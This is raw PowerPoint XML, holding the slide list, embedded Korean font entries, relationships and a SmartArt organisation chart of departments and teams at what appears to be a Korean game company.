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79" r:id="rId2"/>
    <p:sldMasterId id="2147483702" r:id="rId3"/>
    <p:sldMasterId id="2147483714" r:id="rId4"/>
  </p:sldMasterIdLst>
  <p:notesMasterIdLst>
    <p:notesMasterId r:id="rId75"/>
  </p:notesMasterIdLst>
  <p:sldIdLst>
    <p:sldId id="261" r:id="rId5"/>
    <p:sldId id="260" r:id="rId6"/>
    <p:sldId id="262" r:id="rId7"/>
    <p:sldId id="257" r:id="rId8"/>
    <p:sldId id="258" r:id="rId9"/>
    <p:sldId id="259" r:id="rId10"/>
    <p:sldId id="256" r:id="rId11"/>
    <p:sldId id="265" r:id="rId12"/>
    <p:sldId id="267" r:id="rId13"/>
    <p:sldId id="268" r:id="rId14"/>
    <p:sldId id="273" r:id="rId15"/>
    <p:sldId id="274" r:id="rId16"/>
    <p:sldId id="275" r:id="rId17"/>
    <p:sldId id="269" r:id="rId18"/>
    <p:sldId id="278" r:id="rId19"/>
    <p:sldId id="270" r:id="rId20"/>
    <p:sldId id="276" r:id="rId21"/>
    <p:sldId id="277" r:id="rId22"/>
    <p:sldId id="279" r:id="rId23"/>
    <p:sldId id="280" r:id="rId24"/>
    <p:sldId id="281" r:id="rId25"/>
    <p:sldId id="271" r:id="rId26"/>
    <p:sldId id="282" r:id="rId27"/>
    <p:sldId id="283" r:id="rId28"/>
    <p:sldId id="284" r:id="rId29"/>
    <p:sldId id="285" r:id="rId30"/>
    <p:sldId id="263" r:id="rId31"/>
    <p:sldId id="286" r:id="rId32"/>
    <p:sldId id="287" r:id="rId33"/>
    <p:sldId id="288" r:id="rId34"/>
    <p:sldId id="291" r:id="rId35"/>
    <p:sldId id="292" r:id="rId36"/>
    <p:sldId id="293" r:id="rId37"/>
    <p:sldId id="300" r:id="rId38"/>
    <p:sldId id="294" r:id="rId39"/>
    <p:sldId id="295" r:id="rId40"/>
    <p:sldId id="296" r:id="rId41"/>
    <p:sldId id="297" r:id="rId42"/>
    <p:sldId id="340" r:id="rId43"/>
    <p:sldId id="301" r:id="rId44"/>
    <p:sldId id="307" r:id="rId45"/>
    <p:sldId id="306" r:id="rId46"/>
    <p:sldId id="302" r:id="rId47"/>
    <p:sldId id="308" r:id="rId48"/>
    <p:sldId id="309" r:id="rId49"/>
    <p:sldId id="310" r:id="rId50"/>
    <p:sldId id="311" r:id="rId51"/>
    <p:sldId id="312" r:id="rId52"/>
    <p:sldId id="333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41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9" r:id="rId73"/>
    <p:sldId id="338" r:id="rId74"/>
  </p:sldIdLst>
  <p:sldSz cx="12192000" cy="6858000"/>
  <p:notesSz cx="6858000" cy="9144000"/>
  <p:embeddedFontLst>
    <p:embeddedFont>
      <p:font typeface="새굴림" panose="02030600000101010101" pitchFamily="18" charset="-127"/>
      <p:regular r:id="rId76"/>
    </p:embeddedFont>
    <p:embeddedFont>
      <p:font typeface="HY수평선B" panose="020B0600000101010101" charset="-127"/>
      <p:regular r:id="rId77"/>
    </p:embeddedFont>
    <p:embeddedFont>
      <p:font typeface="HY강B" panose="020B0600000101010101" charset="-127"/>
      <p:regular r:id="rId78"/>
    </p:embeddedFont>
    <p:embeddedFont>
      <p:font typeface="맑은 고딕" panose="020B0503020000020004" pitchFamily="50" charset="-127"/>
      <p:regular r:id="rId79"/>
      <p:bold r:id="rId80"/>
    </p:embeddedFont>
    <p:embeddedFont>
      <p:font typeface="MD아트체" panose="020B0600000101010101" charset="-127"/>
      <p:regular r:id="rId81"/>
    </p:embeddedFont>
    <p:embeddedFont>
      <p:font typeface="DejaVu Sans Mono" panose="020B0604020202020204" charset="0"/>
      <p:regular r:id="rId82"/>
      <p:bold r:id="rId83"/>
      <p:italic r:id="rId84"/>
      <p:boldItalic r:id="rId85"/>
    </p:embeddedFont>
    <p:embeddedFont>
      <p:font typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
      <p:regular r:id="rId86"/>
      <p:bold r:id="rId87"/>
      <p:italic r:id="rId88"/>
      <p:boldItalic r:id="rId89"/>
    </p:embeddedFont>
    <p:embeddedFont>
      <p:font typeface="MD아롱체" panose="020B0600000101010101" charset="-127"/>
      <p:regular r:id="rId90"/>
    </p:embeddedFont>
    <p:embeddedFont>
      <p:font typeface="HY동녘B" panose="020B0600000101010101" charset="-127"/>
      <p:regular r:id="rId91"/>
    </p:embeddedFont>
    <p:embeddedFont>
      <p:font typeface="HY견고딕" panose="02030600000101010101" pitchFamily="18" charset="-127"/>
      <p:regular r:id="rId92"/>
    </p:embeddedFont>
    <p:embeddedFont>
      <p:font typeface="Calibri Light" panose="020F0302020204030204" pitchFamily="34" charset="0"/>
      <p:regular r:id="rId93"/>
      <p:italic r:id="rId9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5387"/>
    <a:srgbClr val="63AF24"/>
    <a:srgbClr val="7DD3E4"/>
    <a:srgbClr val="7DD4E5"/>
    <a:srgbClr val="05060B"/>
    <a:srgbClr val="1B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64" autoAdjust="0"/>
    <p:restoredTop sz="94660"/>
  </p:normalViewPr>
  <p:slideViewPr>
    <p:cSldViewPr snapToGrid="0">
      <p:cViewPr varScale="1">
        <p:scale>
          <a:sx n="51" d="100"/>
          <a:sy n="51" d="100"/>
        </p:scale>
        <p:origin x="34" y="7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00" d="100"/>
          <a:sy n="100" d="100"/>
        </p:scale>
        <p:origin x="1628" y="-131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9.fntdata"/><Relationship Id="rId89" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/font" Target="fonts/font14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font" Target="fonts/font4.fntdata"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide1.xml"/><Relationship Id="rId90" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/font" Target="fonts/font15.fntdata"/><Relationship Id="rId95" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/presProps" Target="pres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88" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/font" Target="fonts/font13.fntdata"/><Relationship Id="rId91" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/font" Target="fonts/font16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font" Target="fonts/font11.fntdata"/><Relationship Id="rId94" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/font" Target="fonts/font19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1.fntdata"/><Relationship Id="rId97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17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12.fntdata"/><Relationship Id="rId61" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide57.xml"/><Relationship Id="rId82" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/font" Target="fonts/font7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font" Target="fonts/font2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font" Target="fonts/font18.fntdata"/><Relationship Id="rId9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C39423-66C0-48F8-9997-E10AFAAC0CA8}" type="doc">
      <dgm:prSet loTypeId="urn:microsoft.com/office/officeart/2005/8/layout/orgChart1" loCatId="hierarchy" qsTypeId="urn:microsoft.com/office/officeart/2005/8/quickstyle/3d1" qsCatId="3D" csTypeId="urn:microsoft.com/office/officeart/2005/8/colors/accent3_4" csCatId="accent3" phldr="1"/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:pPr latinLnBrk="1"/>
          <a:endParaRPr lang="ko-KR" altLang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{E1A7A9B7-9F2D-41B9-9A07-5CE56511670F}">
      <dgm:prSet phldrT="[텍스트]"/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:pPr latinLnBrk="1"/>
          <a:r>
            <a:rPr lang="ko-KR" altLang="en-US" b="1" dirty="0"/>
            <a:t>대표 이사</a:t>
          </a:r>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{31697814-D4DC-4022-80A1-E63D339C3024}" type="parTrans" cxnId="{657407BE-7709-49E9-BA37-F71F7F89C98A}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:pPr latinLnBrk="1"/>
          <a:endParaRPr lang="ko-KR" altLang="en-US" b="1"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{E5D16C72-15C4-4C48-82DB-1CC935970A75}" type="sibTrans" cxnId="{657407BE-7709-49E9-BA37-F71F7F89C98A}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:pPr latinLnBrk="1"/>
          <a:endParaRPr lang="ko-KR" altLang="en-US" b="1"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{CFDD13D3-6001-4F49-8A36-5BE0F146D0C5}">
      <dgm:prSet phldrT="[텍스트]"/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:pPr latinLnBrk="1"/>
          <a:r>
            <a:rPr lang="ko-KR" altLang="en-US" b="1" dirty="0"/>
            <a:t>경영기획부</a:t>
          </a:r>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{92CC0500-A6AF-40F9-B41A-26200A7C10CE}" type="parTrans" cxnId="{099F2507-31C1-4A8E-974B-67BED517571E}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:pPr latinLnBrk="1"/>
          <a:endParaRPr lang="ko-KR" altLang="en-US" b="1"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{D2200EFF-2A00-4354-81CB-802A2E72A557}" type="sibTrans" cxnId="{099F2507-31C1-4A8E-974B-67BED517571E}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:pPr latinLnBrk="1"/>
          <a:endParaRPr lang="ko-KR" altLang="en-US" b="1"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{52D4EA74-38A7-4213-8577-31A509B1B95C}">
      <dgm:prSet phldrT="[텍스트]"/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:pPr latinLnBrk="1"/>
          <a:r>
            <a:rPr lang="ko-KR" altLang="en-US" b="1" dirty="0"/>
            <a:t>개발관리부</a:t>
          </a:r>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{FDF0099B-506B-439E-9FEC-FD6907C89EF3}" type="parTrans" cxnId="{0D3154B2-B496-4372-9DC8-04A0E6F6C7E3}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:pPr latinLnBrk="1"/>
          <a:endParaRPr lang="ko-KR" altLang="en-US" b="1"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{2AD45B3B-2A81-48CF-BA60-C2164935D618}" type="sibTrans" cxnId="{0D3154B2-B496-4372-9DC8-04A0E6F6C7E3}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:pPr latinLnBrk="1"/>
          <a:endParaRPr lang="ko-KR" altLang="en-US" b="1"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{FD16812C-7DA5-44EA-9131-783F3D452544}">
      <dgm:prSet phldrT="[텍스트]"/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:pPr latinLnBrk="1"/>
          <a:r>
            <a:rPr lang="ko-KR" altLang="en-US" b="1" dirty="0"/>
            <a:t>운영관리부</a:t>
          </a:r>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{61793927-EF3A-43AE-A6F3-7BE745145C4A}" type="parTrans" cxnId="{8FC54D1B-13DF-4896-8047-3BDEAA8FE214}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:pPr latinLnBrk="1"/>
          <a:endParaRPr lang="ko-KR" altLang="en-US" b="1"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{8C46EDFF-604D-4411-81EA-91E591B3D38E}" type="sibTrans" cxnId="{8FC54D1B-13DF-4896-8047-3BDEAA8FE214}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:pPr latinLnBrk="1"/>
          <a:endParaRPr lang="ko-KR" altLang="en-US" b="1"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{A82A6390-19EA-4EBE-8705-86802A3C5216}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:pPr latinLnBrk="1"/>
          <a:r>
            <a:rPr lang="ko-KR" altLang="en-US" b="1" dirty="0"/>
            <a:t>사업지원부</a:t>
          </a:r>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{21931ED7-AD88-4C16-91FA-FD91A79CB81B}" type="parTrans" cxnId="{65244865-1381-442D-8E96-5D8718E7735A}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:pPr latinLnBrk="1"/>
          <a:endParaRPr lang="ko-KR" altLang="en-US" b="1"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{A442EBCC-9198-41C3-B3C0-ED5C1619FE63}" type="sibTrans" cxnId="{65244865-1381-442D-8E96-5D8718E7735A}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:pPr latinLnBrk="1"/>
          <a:endParaRPr lang="ko-KR" altLang="en-US" b="1"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{922BB256-717E-4666-844E-08CAF2B217C4}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:pPr latinLnBrk="1"/>
          <a:r>
            <a:rPr lang="ko-KR" altLang="en-US" b="1" dirty="0"/>
            <a:t>국제사업부</a:t>
          </a:r>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{04359B4E-AF3C-4A03-90C7-8BD6B66F0E66}" type="parTrans" cxnId="{12696A8D-059B-40F8-957D-1A80D06E9032}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:pPr latinLnBrk="1"/>
          <a:endParaRPr lang="ko-KR" altLang="en-US" b="1"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{0AC2D709-F865-49FF-BA0D-AF5A1A3302FA}" type="sibTrans" cxnId="{12696A8D-059B-40F8-957D-1A80D06E9032}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:pPr latinLnBrk="1"/>
          <a:endParaRPr lang="ko-KR" altLang="en-US" b="1"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{6ED9E313-FF31-4746-9CFC-667F1D6EE890}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:pPr latinLnBrk="1"/>
          <a:r>
            <a:rPr lang="ko-KR" altLang="en-US" b="1" dirty="0"/>
            <a:t>국제사업기획팀</a:t>
          </a:r>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{7E640902-B7E0-47D6-AD35-048BEC456602}" type="parTrans" cxnId="{75C0F84E-C7C4-4EC2-976E-C491B1D0679C}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:pPr latinLnBrk="1"/>
          <a:endParaRPr lang="ko-KR" altLang="en-US" b="1"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{C63BE558-82C9-4109-A652-4C151B8029F8}" type="sibTrans" cxnId="{75C0F84E-C7C4-4EC2-976E-C491B1D0679C}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:pPr latinLnBrk="1"/>
          <a:endParaRPr lang="ko-KR" altLang="en-US" b="1"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{44CE9776-2874-4AD1-8956-41EC267B133C}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:pPr latinLnBrk="1"/>
          <a:r>
            <a:rPr lang="ko-KR" altLang="en-US" b="1" dirty="0" err="1"/>
            <a:t>마케팅팀</a:t>
          </a:r>
          <a:endParaRPr lang="ko-KR" altLang="en-US" b="1" dirty="0"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{C8379257-E1C8-42C8-9E54-3D9AD6F1CE39}" type="parTrans" cxnId="{30CB04F8-A4DF-4396-9E7E-4B2744C0067E}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:pPr latinLnBrk="1"/>
          <a:endParaRPr lang="ko-KR" altLang="en-US" b="1"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{548C9D7D-CC69-4541-8D70-59CE89DF6697}" type="sibTrans" cxnId="{30CB04F8-A4DF-4396-9E7E-4B2744C0067E}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:pPr latinLnBrk="1"/>
          <a:endParaRPr lang="ko-KR" altLang="en-US" b="1"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{A32C1D27-533E-4BE5-B948-7E127579D9E9}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:pPr latinLnBrk="1"/>
          <a:r>
            <a:rPr lang="ko-KR" altLang="en-US" b="1" dirty="0" err="1"/>
            <a:t>유저관리팀</a:t>
          </a:r>
          <a:endParaRPr lang="ko-KR" altLang="en-US" b="1" dirty="0"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{66560969-BC25-4344-BE9F-D4F3E23273B7}" type="parTrans" cxnId="{8D94CB90-7C0D-4EC2-8A8A-D5C33D6AFA0B}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:pPr latinLnBrk="1"/>
          <a:endParaRPr lang="ko-KR" altLang="en-US" b="1"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{143507A4-B841-4663-AAB0-C60334008555}" type="sibTrans" cxnId="{8D94CB90-7C0D-4EC2-8A8A-D5C33D6AFA0B}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:pPr latinLnBrk="1"/>
          <a:endParaRPr lang="ko-KR" altLang="en-US" b="1"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{A86102D2-C3EF-47E2-B5C6-A5ECA8644A7E}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:pPr latinLnBrk="1"/>
          <a:r>
            <a:rPr lang="ko-KR" altLang="en-US" b="1" dirty="0"/>
            <a:t>게임기획팀</a:t>
          </a:r>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{E7783E95-3389-49F1-A6D0-AE3A10ADFA58}" type="parTrans" cxnId="{A8F78052-C233-43CA-B9F3-ECB121179868}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:pPr latinLnBrk="1"/>
          <a:endParaRPr lang="ko-KR" altLang="en-US" b="1"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{86DE6FED-6AB5-45FC-9D57-C2C550F81AC4}" type="sibTrans" cxnId="{A8F78052-C233-43CA-B9F3-ECB121179868}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:pPr latinLnBrk="1"/>
          <a:endParaRPr lang="ko-KR" altLang="en-US" b="1"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{1186AAE0-65F6-45CD-8268-F762104C3128}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:pPr latinLnBrk="1"/>
          <a:r>
            <a:rPr lang="ko-KR" altLang="en-US" b="1" dirty="0"/>
            <a:t>경영기획팀</a:t>
          </a:r>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{FBB35C2F-CCB2-4434-AE65-F01C39D4A060}" type="parTrans" cxnId="{A448BD8A-A296-4942-BACA-CED3004CA85E}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:pPr latinLnBrk="1"/>
          <a:endParaRPr lang="ko-KR" altLang="en-US" b="1"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{449131D3-8ECF-42C0-AEC3-9B590924BF70}" type="sibTrans" cxnId="{A448BD8A-A296-4942-BACA-CED3004CA85E}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:pPr latinLnBrk="1"/>
          <a:endParaRPr lang="ko-KR" altLang="en-US" b="1"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{D5872304-C2E3-419E-B551-3EE8189A49CE}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:pPr latinLnBrk="1"/>
          <a:r>
            <a:rPr lang="ko-KR" altLang="en-US" b="1" dirty="0" err="1"/>
            <a:t>회계팀</a:t>
          </a:r>
          <a:endParaRPr lang="ko-KR" altLang="en-US" b="1" dirty="0"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{07610205-8589-4107-B428-2F669D5E9520}" type="parTrans" cxnId="{D58BF29D-A09B-442D-BF54-B63D2FDCF0B2}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:pPr latinLnBrk="1"/>
          <a:endParaRPr lang="ko-KR" altLang="en-US" b="1"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{F1FC4921-9084-48E4-9C4A-205CF164DB14}" type="sibTrans" cxnId="{D58BF29D-A09B-442D-BF54-B63D2FDCF0B2}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:pPr latinLnBrk="1"/>
          <a:endParaRPr lang="ko-KR" altLang="en-US" b="1"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{C798D39D-4B21-4D54-8D64-66EE143A2B47}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:pPr latinLnBrk="1"/>
          <a:r>
            <a:rPr lang="ko-KR" altLang="en-US" b="1" dirty="0"/>
            <a:t>게임개발팀</a:t>
          </a:r>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{81593E25-129B-4521-A266-C37333A9AA67}" type="parTrans" cxnId="{F4AEA2D3-1088-4EAB-80CC-78CA96529B42}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:pPr latinLnBrk="1"/>
          <a:endParaRPr lang="ko-KR" altLang="en-US" b="1"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{F2319BEA-5463-4ED9-9FBE-27A9B72AEDE6}" type="sibTrans" cxnId="{F4AEA2D3-1088-4EAB-80CC-78CA96529B42}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:pPr latinLnBrk="1"/>
          <a:endParaRPr lang="ko-KR" altLang="en-US" b="1"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{66EC15BB-BF4A-40D1-9AB5-821B76B67B02}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:pPr latinLnBrk="1"/>
          <a:r>
            <a:rPr lang="ko-KR" altLang="en-US" b="1" dirty="0" err="1"/>
            <a:t>게임관리팀</a:t>
          </a:r>
          <a:endParaRPr lang="ko-KR" altLang="en-US" b="1" dirty="0"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{574389B7-DB12-45E0-83C3-5180DC35E753}" type="parTrans" cxnId="{BC579E5C-E6BD-4AE2-8334-1D58ED873FDA}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:pPr latinLnBrk="1"/>
          <a:endParaRPr lang="ko-KR" altLang="en-US" b="1"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{6B11A579-E978-4F18-B30B-AD50EA74E968}" type="sibTrans" cxnId="{BC579E5C-E6BD-4AE2-8334-1D58ED873FDA}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:pPr latinLnBrk="1"/>
          <a:endParaRPr lang="ko-KR" altLang="en-US" b="1"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{C6FEFCDD-281A-4B93-9F20-6B4919731109}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:pPr latinLnBrk="1"/>
          <a:r>
            <a:rPr lang="ko-KR" altLang="en-US" b="1" dirty="0" err="1"/>
            <a:t>사업지원팀</a:t>
          </a:r>
          <a:endParaRPr lang="ko-KR" altLang="en-US" b="1" dirty="0"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{E0EB6C24-871D-4C91-971A-32DEA4744105}" type="parTrans" cxnId="{D0125F18-A349-43D6-BD1C-299FBC7CE647}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:pPr latinLnBrk="1"/>
          <a:endParaRPr lang="ko-KR" altLang="en-US" b="1"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{1CE06F3E-9A9E-4FD3-821C-B146115E01A1}" type="sibTrans" cxnId="{D0125F18-A349-43D6-BD1C-299FBC7CE647}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:pPr latinLnBrk="1"/>
          <a:endParaRPr lang="ko-KR" altLang="en-US" b="1"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{4A6590A6-1FEA-4D57-BC10-A045948EB6BB}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:pPr latinLnBrk="1"/>
          <a:r>
            <a:rPr lang="ko-KR" altLang="en-US" b="1" dirty="0" err="1"/>
            <a:t>국제사업운영팀</a:t>
          </a:r>
          <a:endParaRPr lang="ko-KR" altLang="en-US" b="1" dirty="0"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{B17019FD-6285-42C0-BD9A-4523C10A2596}" type="parTrans" cxnId="{6520A067-6D8B-447C-BE1E-C909813B0735}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:pPr latinLnBrk="1"/>
          <a:endParaRPr lang="ko-KR" altLang="en-US" b="1"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{E1775935-EABE-4701-A39C-6A1F8C8C221C}" type="sibTrans" cxnId="{6520A067-6D8B-447C-BE1E-C909813B0735}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:pPr latinLnBrk="1"/>
          <a:endParaRPr lang="ko-KR" altLang="en-US" b="1"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{C371C46C-0EF7-4470-9A98-21ABF4A28233}" type="pres">
      <dgm:prSet presAssocID="{7AC39423-66C0-48F8-9997-E10AFAAC0CA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654BA32-F7DF-4AF7-AB4E-0F19AF1B35A4}" type="pres">
      <dgm:prSet presAssocID="{E1A7A9B7-9F2D-41B9-9A07-5CE56511670F}" presName="hierRoot1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703C83B-D0FA-491D-8D27-E5450EA1605D}" type="pres">
